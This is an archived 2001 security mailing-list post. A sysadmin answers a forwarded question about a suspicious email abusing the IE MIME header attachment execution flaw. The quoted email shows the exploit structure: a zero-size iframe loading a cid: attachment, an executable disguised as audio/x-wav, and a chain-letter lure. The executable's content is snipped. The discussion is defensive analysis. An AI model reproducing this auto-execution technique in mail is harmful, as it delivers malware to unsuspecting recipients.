'Microsoft IE MIME Header Attachment Execution Vulnerability' It was discovered a couple months ago. If it was an exe it would have run, although since it asked you wheter you want to save it or run it, it means your system is patched anyway. Explanation and example. http://www.kriptopolis.com/cua/eml.html > -----Original Message----- > From: Marius Huse Jacobsen [mailto:mahujaat_private] > Sent: 20 July 2001 22:24 > To: vuln-devat_private > Subject: A very dangerous mail... > > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Edited to protect any innocents. > Obvious forgery (supposedly from microsoft.com) > I'm using ZoneAlarm MailSafe -> .exe changed to .zl9 > It tries to start the attachment exe automatically (Outlook Express) > - - it asks me if I want to save or start the zl9 file but I > don't know > what it would do to an exe. > > Exactly how bad is it? The offending line seems to be > <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe> > > Html email was a curse to begin with and it hasn't become any better. > Can anyone give me that ascii ribbon sig? > > > 8< --------- Start offending letter ----------- > Return-Path: <zinaat_private> > Received: from smtp08.somewhereonthenet.com > (smtp08.somewhereonthenet.com [196.*.*.*]) > by mail.my_isp.com (8.9.3/8.9.3) with ESMTP id PAA16304 > for <myat_private>; Sat, 14 Jul 2001 15:10:00 +0200 (MET DST) > Received: from microsoft.com ([196.*.*.*]) > by smtp08.somewhereonthenet.com (Sun Internet Mail Server > sims.3.5.2000.03.23.18.03.p10) > with SMTP id <0GGG009BGSJHYEat_private> for myat_private; > Sat, > 14 Jul 2001 15:09:40 +0200 (SAT) > Date: Sat, 14 Jul 2001 15:09:01 +0100 > From: Lyndaat_private > Subject: Fw: 100,000 lemmings can't be ... > To: removedat_private > Message-id: <0GGG009BISJHYEat_private> > MIME-version: 1.0 > Content-type: multipart/mixed; boundary="nymph" > > This is a multi-part message in MIME format. > > - --nymph > Content-Type: text/html; > charset="iso-8859-1" > Content-Transfer-Encoding: quoted-printable > > <HTML> > <HEAD> > </HEAD> > <BODY bgColor=3D#ffffff> > <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe> > <P align=center><FONT size=7><SPAN > class=590014113-13042001>SMACK!!!</SPAN></FONT></P> > <P align=center><FONT size=7><SPAN class=590014113-13042001>You have > been > hit</SPAN></FONT></P> > <P align=center><SPAN class=590014113-13042001>This is the > funny-attachment war! > You have just been hit and by the rule book you can't hit this person > back. To > be in the game you need to send this message to five of your friends, > try to > find some small and funny attachment to send along. If you don't have > time use > the one you got hit by, go ahead hit someone!</SPAN></P> > <P align=center><FONT size=7><SPAN > class=590014113-13042001></SPAN></FONT> </P></BODY></HTML> > > - --nymph > Content-Type: audio/x-wav; > name="setup.zl9" > Content-Transfer-Encoding: base64 > Content-ID: <THE-CID> > > <snip .exe content> > > - --nymph > <snip fortune.zip> > > - --nymph-- > > > -----BEGIN PGP SIGNATURE----- > Version: PGP 7.0.4 > > iQA/AwUBO1ihZUcYTo91XF1EEQImJgCg5UccaNK/H1g27tAzUm23TayOfpQAnjDk > sqjAlFfiJIKdd21U6wxArNXb > =63JI > -----END PGP SIGNATURE----- > > > > > _________________________________________ Aidan O'Kelly Systems Administrator okellyat_private Xnet - The Data Storage People Dublin: +353 (1) 2740 100 Belfast: +44(28) 9073 5872 www.xnet.ie | storageat_private ******************************************************************* Privileged/Confidential Information may be contained in this message. If you are not the addressee indicated in this message (or responsible for delivery of the message to such person), you may not copy or deliver this message to anyone. In such case, you should destroy this message and kindly notify the sender by reply email. Please advise immediately if you or your employer do not consent to Internet email for messages of this kind. Opinions, conclusions and other information in this message that do not relate to the official business of Xnet and shall be understood as neither given nor endorsed by it. ********************************************************************
This archive was generated by hypermail 2b30 : Mon Jul 23 2001 - 10:53:34 PDT